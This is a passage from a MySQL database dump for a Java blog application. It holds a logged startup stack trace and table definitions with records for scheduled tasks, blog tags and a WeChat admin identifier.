org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1549)\r\n	at java.util.concurrent.FutureTask.run(FutureTask.java:262)\r\n	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)\r\n	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)\r\n	at java.lang.Thread.run(Thread.java:745)\r\nCaused by: java.lang.NullPointerException\r\n	at cc.s2m.web.s2mBlog.init.InitWebApplication.initWeb(InitWebApplication.java:33)\r\n	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)\r\n	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n	at java.lang.reflect.Method.invoke(Method.java:606)\r\n	at org.springframework.beans.factory.annotation.InitDestroyAnnotationBeanPostProcessor$LifecycleElement.invoke(InitDestroyAnnotationBeanPostProcessor.java:354)\r\n	at org.springframework.beans.factory.annotation.InitDestroyAnnotationBeanPostProcessor$LifecycleMetadata.invokeInitMethods(InitDestroyAnnotationBeanPostProcessor.java:305)\r\n	at org.springframework.beans.factory.annotation.InitDestroyAnnotationBeanPostProcessor.postProcessBeforeInitialization(InitDestroyAnnotationBeanPostProcessor.java:133)\r\n	... 30 more\r\n', '2015-09-29 13:42:58');

-- ----------------------------
-- Table structure for sys_task_handel
-- ----------------------------
DROP TABLE IF EXISTS `sys_task_handel`;
CREATE TABLE `sys_task_handel` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `module_name` varchar(64) NOT NULL,
  `hostname` varchar(64) NOT NULL,
  `ip_address` varchar(64) NOT NULL,
  `isEnabled` bit(1) NOT NULL,
  `created_at` datetime NOT NULL,
  `updated_at` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8;

-- ----------------------------
-- Records of sys_task_handel
-- ----------------------------
INSERT INTO `sys_task_handel` VALUES ('1', 'TestTask', 'gooking', '192.168.10.45,10.127.127.1', '\0', '2015-09-14 15:35:33', '2015-09-14 15:35:33');
INSERT INTO `sys_task_handel` VALUES ('2', 'TestTask', '127a25cd89d9', '192.168.42.45', '\0', '2015-09-17 13:40:44', '2015-09-17 13:40:44');
INSERT INTO `sys_task_handel` VALUES ('3', 'ClearAdminActionsTask', 'gooking', '192.168.10.45,10.127.127.1', '\0', '2015-09-22 13:19:30', '2015-09-22 13:19:30');
INSERT INTO `sys_task_handel` VALUES ('4', 'ClearAdminActionsTask', '127a25cd89d9', '192.168.42.47', '', '2015-09-22 13:42:32', '2015-09-22 13:42:32');
INSERT INTO `sys_task_handel` VALUES ('6', 'RefreshWxTokenTask', 'gooking', '192.168.10.45,10.127.127.1', '', '2015-09-28 08:40:39', '2015-09-28 08:40:39');
INSERT INTO `sys_task_handel` VALUES ('7', 'RefreshWxTokenTask', '127a25cd89d9', '192.168.42.53', '', '2015-09-28 09:43:33', '2015-09-28 09:43:33');
INSERT INTO `sys_task_handel` VALUES ('8', 'PublishWeixinArticlesTask', 'gooking', '192.168.10.45,10.127.127.1', '', '2015-09-28 15:44:18', '2015-09-28 15:44:18');
INSERT INTO `sys_task_handel` VALUES ('9', 'PublishWeixinArticlesTask', '127a25cd89d9', '192.168.42.54', '\0', '2015-09-28 17:19:02', '2015-09-28 17:19:02');

-- ----------------------------
-- Table structure for sys_task_log
-- ----------------------------
DROP TABLE IF EXISTS `sys_task_log`;
CREATE TABLE `sys_task_log` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `module_name` varchar(64) NOT NULL,
  `hostname` varchar(64) NOT NULL,
  `ip_address` varchar(64) NOT NULL,
  `isSuccess` bit(1) NOT NULL,
  `created_at` datetime NOT NULL,
  `updated_at` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=18040 DEFAULT CHARSET=utf8;

-- ----------------------------
-- Table structure for tags
-- ----------------------------
DROP TABLE IF EXISTS `tags`;
CREATE TABLE `tags` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) NOT NULL,
  `url` varchar(100) NOT NULL,
  `number` int(11) NOT NULL DEFAULT '0' COMMENT '文章数',
  PRIMARY KEY (`id`),
  UNIQUE KEY `IDX_NAME` (`name`) USING BTREE,
  UNIQUE KEY `IDX_URL` (`url`) USING BTREE
) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=utf8mb4;

-- ----------------------------
-- Records of tags
-- ----------------------------
INSERT INTO `tags` VALUES ('3', 'JavaScript', 'js', '1');
INSERT INTO `tags` VALUES ('5', 'Mysql', 'mysql', '1');
INSERT INTO `tags` VALUES ('7', '常见问题', 'faq', '7');
INSERT INTO `tags` VALUES ('8', '更新记录', 'release', '3');
INSERT INTO `tags` VALUES ('9', '缓存', 'cache', '1');
INSERT INTO `tags` VALUES ('10', 'memcached', 'memcached', '1');
INSERT INTO `tags` VALUES ('11', '数据库', 'database', '1');
INSERT INTO `tags` VALUES ('12', '功能', 'mods', '8');
INSERT INTO `tags` VALUES ('13', '安全', 'safe', '3');
INSERT INTO `tags` VALUES ('14', '最新动态', 'news', '8');
INSERT INTO `tags` VALUES ('15', '微信发博文', 'weixin-publish-blog', '2');

-- ----------------------------
-- Table structure for weixin_admin
-- ----------------------------
DROP TABLE IF EXISTS `weixin_admin`;
CREATE TABLE `weixin_admin` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `openid` varchar(255) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4;

-- ----------------------------
-- Records of weixin_admin
-- ----------------------------
INSERT INTO `weixin_admin` VALUES ('6', 'oRfy6jmSAYhZiTVD5IHQZ1KJh7aA');
